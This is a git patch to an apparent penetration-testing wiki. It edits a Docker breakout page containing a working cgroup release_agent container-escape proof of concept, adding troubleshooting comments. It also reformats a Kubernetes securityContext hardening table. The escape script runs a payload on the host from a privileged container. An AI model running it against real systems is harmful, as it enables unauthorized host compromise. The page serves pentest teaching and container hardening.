From 44abb048391aa84a0ecba7603c96dfc558e5645e Mon Sep 17 00:00:00 2001 From: CPol Date: Thu, 13 Jan 2022 02:10:16 +0000 Subject: [PATCH] GitBook: [#2948] No subject --- .../docker-breakout-privilege-escalation.md | 12 +++++++++- .../kubernetes-securitycontext-s.md | 24 +++++++++---------- 2 files changed, 23 insertions(+), 13 deletions(-) diff --git a/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md b/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md index ab0f4bd4f..a6c4a948c 100644 --- a/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md +++ b/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md @@ -132,20 +132,29 @@ debugfs /dev/sda1 # Finds + enables a cgroup release_agent ## Looks for something like: /sys/fs/cgroup/*/release_agent d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` +# If "d" is empty, this won't work, you need to use the next PoC + # Enables notify_on_release in the cgroup -mkdir -p $d/w;echo 1 >$d/w/notify_on_release +mkdir -p $d/w; +echo 1 >$d/w/notify_on_release +# If you have a "Read-only file system" error, you need to use the next PoC + # Finds path of OverlayFS mount for container # Unless the configuration explicitly exposes the mount point of the host filesystem # see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html t=`sed -n 's/overlay \/ .*\perdir=\([^,]*\).*/\1/p' /etc/mtab` + # Sets release_agent to /path/payload touch /o; echo $t/c > $d/release_agent + # Creates a payload echo "#!/bin/sh" > /c echo "ps > $t/o" >> /c chmod +x /c + # Triggers the cgroup via empty cgroup.procs sh -c "echo 0 > $d/w/cgroup.procs"; sleep 1 + # Reads the output cat /o ``` @@ -163,6 +172,7 @@ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubunt # If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist" # It's because your setup doesn't have the RDMA cgroup controller, try change rdma to memory to fix it mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x +# If mount gives an error, this won't work, you need to use the first PoC # Enables cgroup notifications on release of the "x" cgroup echo 1 > /tmp/cgrp/x/notify_on_release diff --git a/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md b/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md index 6db817856..0580ae283 100644 --- a/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md +++ b/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md @@ -7,19 +7,19 @@ When specifying the security context of a Pod you can use several attributes. Fr * To have **runASNonRoot** as **True** * To configure **runAsUser** * If possible, consider **limiting** **permissions** indicating **seLinuxOptions** and **seccompProfile** -* Do **NOT** give **privilege** **group** access via **fsGroup**, **runAsGroup** and **supplementaryGroups** +* Do **NOT** give **privilege** **group** access via **runAsGroup** and **supplementaryGroups** -|

fsGroup
integer

| This allows to specify a **supplementary groups to all processes of the containers**. Usually used to give access to mounted volumes. | -| --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | -|

fsGroupChangePolicy
string

| This defines behavior of **changing ownership and permission of the volume** before being exposed inside Pod. | -|

runAsGroup
integer

| The **GID to run the entrypoint of the container process**. Uses runtime default if unset. May also be set in SecurityContext. | -|

runAsNonRoot
boolean

| Indicates that the container must run as a non-root user. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. | -|

runAsUser
integer

| The **UID to run the entrypoint of the container process**. Defaults to user specified in image metadata if unspecified. | -|

seLinuxOptions
SELinuxOptions
More info about seLinux

| The **SELinux context to be applied to all containers**. If unspecified, the container runtime will allocate a random SELinux context for each container. | -|

seccompProfile
SeccompProfile
More info about Seccomp

| The **seccomp options to use by the containers** in this pod. | -|

supplementalGroups
integer array

| A list of **groups applied to the first process run in each container**, in addition to the container's primary GID. | -|

sysctls
Sysctl array
More info about sysctls

| Sysctls hold a list of **namespaced sysctls used for the pod**. Pods with unsupported sysctls (by the container runtime) might fail to launch. | -|

windowsOptions
WindowsSecurityContextOptions

| The Windows specific settings applied to all containers. If unspecified, the options within a container's SecurityContext will be used. | +|

fsGroup
integer

|

A special supplemental group that applies to all containers in a pod. Some volume types allow the Kubelet to change the ownership of that volume to be owned by the pod:
1. The owning GID will be the FSGroup
2. The setgid bit is set (new files created in the volume will be owned by FSGroup)
3. The permission bits are OR'd with rw-rw---- If unset, the Kubelet will not modify the ownership and permissions of any volume

| +| --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | +|

fsGroupChangePolicy
string

| This defines behavior of **changing ownership and permission of the volume** before being exposed inside Pod. | +|

runAsGroup
integer

| The **GID to run the entrypoint of the container process**. Uses runtime default if unset. May also be set in SecurityContext. | +|

runAsNonRoot
boolean

| Indicates that the container must run as a non-root user. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. | +|

runAsUser
integer

| The **UID to run the entrypoint of the container process**. Defaults to user specified in image metadata if unspecified. | +|

seLinuxOptions
SELinuxOptions
More info about seLinux

| The **SELinux context to be applied to all containers**. If unspecified, the container runtime will allocate a random SELinux context for each container. | +|

seccompProfile
SeccompProfile
More info about Seccomp

| The **seccomp options to use by the containers** in this pod. | +|

supplementalGroups
integer array

| A list of **groups applied to the first process run in each container**, in addition to the container's primary GID. | +|

sysctls
Sysctl array
More info about sysctls

| Sysctls hold a list of **namespaced sysctls used for the pod**. Pods with unsupported sysctls (by the container runtime) might fail to launch. | +|

windowsOptions
WindowsSecurityContextOptions

| The Windows specific settings applied to all containers. If unspecified, the options within a container's SecurityContext will be used. | ## SecurityContext